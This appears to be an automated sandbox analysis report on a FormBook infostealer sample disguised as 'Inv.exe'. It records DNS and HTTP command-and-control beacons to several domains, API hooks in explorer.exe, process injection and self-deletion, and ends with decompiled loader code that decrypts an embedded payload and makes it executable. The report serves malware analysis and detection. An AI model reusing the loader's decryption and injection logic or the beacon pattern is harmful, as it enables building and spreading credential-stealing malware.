                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:28:16.932145119 CET8.8.8.8192.168.2.40xa49cNo error (0)www.nationshiphop.comnationshiphop.comCNAME (Canonical name)IN (0x0001)
                                              Jan 13, 2021 21:28:16.932145119 CET8.8.8.8192.168.2.40xa49cNo error (0)nationshiphop.com34.102.136.180A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:28:40.007352114 CET8.8.8.8192.168.2.40x733No error (0)www.hwcailing.com107.160.136.152A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.millcityloam.com
                                              • www.achonabu.com
                                              • www.a-zsolutionsllc.com
                                              • www.nationshiphop.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.44975934.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 13, 2021 21:26:33.137989044 CET1103OUTGET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1
                                              Host: www.millcityloam.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 13, 2021 21:26:33.276386023 CET1105INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 13 Jan 2021 20:26:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "5ffc838f-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.449767172.96.186.20680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 13, 2021 21:27:14.964339018 CET4038OUTGET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1
                                              Host: www.achonabu.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 13, 2021 21:27:17.656807899 CET4039INHTTP/1.1 404 Not Found
                                              Connection: close
                                              X-Powered-By: PHP/5.6.40
                                              Content-Type: text/html; charset=UTF-8
                                              X-UA-Compatible: IE=edge
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"
                                              X-LiteSpeed-Cache-Control: public,max-age=3600
                                              X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_
                                              X-Litespeed-Cache: miss
                                              Transfer-Encoding: chunked
                                              Date: Wed, 13 Jan 2021 20:27:17 GMT
                                              Server: LiteSpeed
                                              Data Raw: 34 35 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 26 23 38 32 31 31 3b 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 74 61 6c 20 57 6f 72 64 50 72 65 73 73 20 54 68 65 6d 65 20 33 2e 36 2e 30 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52
                                              Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><head><meta charset="UTF-8" /><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="http://abccarpetcare.com/xmlrpc.php"><title>Page not found &#8211; ABC Carpet Care &#8211; ABC Rug Cleaning NYC</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="generator" content="Total WordPress Theme 3.6.0" /><link rel='dns-prefetch' href='//abccarpetcare.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="ABC Carpet Care - ABC Rug Cleaning NYC &raquo; Feed" href="https://abccarpetcare.com/feed/" /><link rel="alternate" type="application/rss+xml" title="ABC Carpet Care - ABC R
                                              Jan 13, 2021 21:27:17.656835079 CET4040INData Raw: 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65
                                              Data Ascii: ug Cleaning NYC &raquo; Comments Feed" href="https://abccarpetcare.com/comments/feed/" /><link rel='stylesheet' id='cnss_font_awesome_css-css' href='http://abccarpetcare.com/wp-content/plugins/easy-social-icons/css/font-awesome/css/all.min.c
                                              Jan 13, 2021 21:27:17.656851053 CET4042INData Raw: 74 74 70 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 54 6f 74 61 6c 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 33 2e 36 2e 30 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73
                                              Data Ascii: ttp://abccarpetcare.com/wp-content/themes/Total/style.css?ver=3.6.0' type='text/css' media='all' /><link rel='stylesheet' id='wpex-google-font-open-sans-css' href='//fonts.googleapis.com/css?family=Open+Sans%3A100%2C200%2C300%2C400%2C500%2C6
                                              Jan 13, 2021 21:27:17.656866074 CET4043INData Raw: 73 3f 76 65 72 3d 33 2e 36 2e 30 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 21 2d 2d 6e 32 63 73 73 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72
                                              Data Ascii: s?ver=3.6.0' type='text/css' media='all' />...n2css--><script type='text/javascript' src='http://abccarpetcare.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script><script type='text/javascript' src='http://abccarpetcare.com/wp-includes
                                              Jan 13, 2021 21:27:17.656888962 CET4045INData Raw: 2e 77 61 74 65 72 2d 64 61 6d 61 67 65 20 2e 77 70 62 5f 73 69 6e 67 6c 65 5f 69 6d 61 67 65 20 69 6d 67 20 7b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 25 20 21 69 6d 70 6f
                                              Data Ascii: .water-damage .wpb_single_image img { height: auto; max-width: 70% !important; vertical-align: top;}.water-damage .vc_column-inner.wpex-clr { padding: 0;}.water-damage .vc_custom_1547070578374 { background-
                                              Jan 13, 2021 21:27:17.656908989 CET4046INData Raw: 72 65 73 70 6f 6e 73 69 76 65 5f 63 73 73 22 3e 2f 2a 2d 2d 2d 2d 2d 43 53 53 20 46 52 4f 4d 20 50 4c 55 47 49 4e 2d 2d 2d 2d 2d 2a 2f 64 69 76 23 6d 6f 62 69 6c 65 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 2f 2a 2d 2d 2d 2d 2d 43
                                              Data Ascii: responsive_css">/*-----CSS FROM PLUGIN-----*/div#mobile { display: none; }/*-----CUSTOM CSS ENDS HERE-----*//*Responsive css starts here*//*-----START OF BREAKPOINT-----*/@media only screen and (min-width: 1080px){}/*-----END OF BREAKPOINT----
                                              Jan 13, 2021 21:27:17.656928062 CET4047INData Raw: 3a 20 36 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 20 64 69 76 23 6d 6f 62 69 6c 65 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 7d 2f 2a 2d 2d 2d 2d 2d 45 4e 44 20 4f 46 20 42 52 45 41 4b 50
                                              Data Ascii: : 60% !important; } div#mobile { display: block !important; }}/*-----END OF BREAKPOINT-----*/</style><style type="text/css" data-type="wpex-css">/*TYPOGRAPHY*/body{font-family:"Open Sans"}/*CUSTOMIZER STYLING*/#top-bar-wrap{border-color:#fffff
                                              Jan 13, 2021 21:27:17.656944990 CET4049INData Raw: 73 2d 63 6f 6e 74 65 6e 74 20 74 6f 70 2d 62 61 72 2d 63 65 6e 74 65 72 65 64 22 3e 0a 0a 09 09 0a 09 09 0a 09 09 09 39 31 37 2d 37 34 37 2d 34 34 38 35 20 20 2f 20 20 32 31 32 2d 34 31 30 2d 37 37 30 30 0a 09 09 0a 09 3c 2f 64 69 76 3e 3c 21 2d
                                              Data Ascii: s-content top-bar-centered">917-747-4485 / 212-410-7700</div>... #top-bar-content --></div>... #top-bar --></div>... #top-bar-wrap --><header id="site-header" class="header-three wpex-full-width wpex-reposition-c
                                              Jan 13, 2021 21:27:17.656961918 CET4050INData Raw: 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 73 66 2d 6d 65 6e 75 22 3e 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 31 36 37 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70
                                              Data Ascii: s="dropdown-menu sf-menu"><li id="menu-item-167" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-167"><a href="https://abccarpetcare.com/"><span class="link-inner">Home</span></a></li><li id="menu-item
                                              Jan 13, 2021 21:27:17.656975031 CET4051INData Raw: 72 22 20 69 74 65 6d 70 72 6f 70 3d 22 68 65 61 64 6c 69 6e 65 22 3e 3c 73 70 61 6e 3e 34 30 34 3a 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 6e 61 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 62 72 65 61 64
                                              Data Ascii: r" itemprop="headline"><span>404: Page Not Found</span></h1><nav class="site-breadcrumbs wpex-clr position-absolute has-js-fix"><span class="breadcrumb-trail"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb" class="trail-begin"


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.449768198.54.117.21780C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 13, 2021 21:27:56.454940081 CET4054OUTGET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1
                                              Host: www.a-zsolutionsllc.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.44976934.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 13, 2021 21:28:16.982839108 CET4055OUTGET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1
                                              Host: www.nationshiphop.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 13, 2021 21:28:17.122550011 CET4055INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 13 Jan 2021 20:28:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "5ffc838f-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE3
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE3
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE3
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE3

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:21:25:31
                                              Start date:13/01/2021
                                              Path:C:\Users\user\Desktop\Inv.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x1230000
                                              File size:333824 bytes
                                              MD5 hash:A3ABA7D40DA6C8C86E4E8D035803F314
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:21:25:34
                                              Start date:13/01/2021
                                              Path:C:\Users\user\Desktop\Inv.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x1230000
                                              File size:333824 bytes
                                              MD5 hash:A3ABA7D40DA6C8C86E4E8D035803F314
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:21:25:37
                                              Start date:13/01/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff6fee60000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:21:25:50
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\autofmt.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\SysWOW64\autofmt.exe
                                              Imagebase:0x1080000
                                              File size:831488 bytes
                                              MD5 hash:7FC345F685C2A58283872D851316ACC4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:21:25:50
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Imagebase:0x3f0000
                                              File size:32768 bytes
                                              MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:21:25:54
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:21:25:54
                                              Start date:13/01/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Executed Functions

                                                C-Code - Quality: 66%
                                                			E01231040(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				struct HINSTANCE__* _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				long _v48;
                                                				void* _v1048;
                                                				void* _v7712;
                                                				void* __ebp;
                                                				void* _t133;
                                                				void* _t134;
                                                				void* _t176;
                                                				void* _t177;
                                                				void* _t178;
                                                				void* _t179;
                                                				void* _t180;
                                                				void* _t184;
                                                
                                                				_t184 = __fp0;
                                                				_t177 = __esi;
                                                				_t176 = __edi;
                                                				_t134 = __ecx;
                                                				E01238770(0x1e1c);
                                                				_v16 = GetModuleHandleW(L"Kernel32.dll");
                                                				E01236B80(_t134); // executed
                                                				_v44 = E01236A70(_v16, 0xb616c5d9);
                                                				_v40 = E01236A70(_v16, 0xe0baa99);
                                                				_v32 = E01236A70(LoadLibraryW(L"User32.dll"), 0x23fdef72);
                                                				_v24 = E01236A70(LoadLibraryW(L"User32.dll"), 0x695c9378);
                                                				_v36 = E01236A70(_v16, 0x9347c911);
                                                				_v28 = _v36(0, L"IEUCIZEO", 0xa);
                                                				_v20 = _v40(0, _v28);
                                                				E01237AE0( &_v7712, _v20, 0x1a05);
                                                				_t180 = _t179 + 0xc;
                                                				_v12 = 0;
                                                				while(_v12 < 0x1a05) {
                                                					_v5 =  *((intOrPtr*)(_t178 + _v12 - 0x1e1c));
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ 0x00000086;
                                                					_v5 = (_v5 & 0x000000ff) + 0x17;
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 = (_v5 & 0x000000ff) + _v12;
                                                					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                					_v5 =  ~(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) - 0x4c;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) + 0x13;
                                                					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					 *((char*)(_t178 + _v12 - 0x1e1c)) = _v5;
                                                					_v12 = _v12 + 1;
                                                				}
                                                				VirtualProtect( &_v7712, 0x1a05, 0x40,  &_v48);
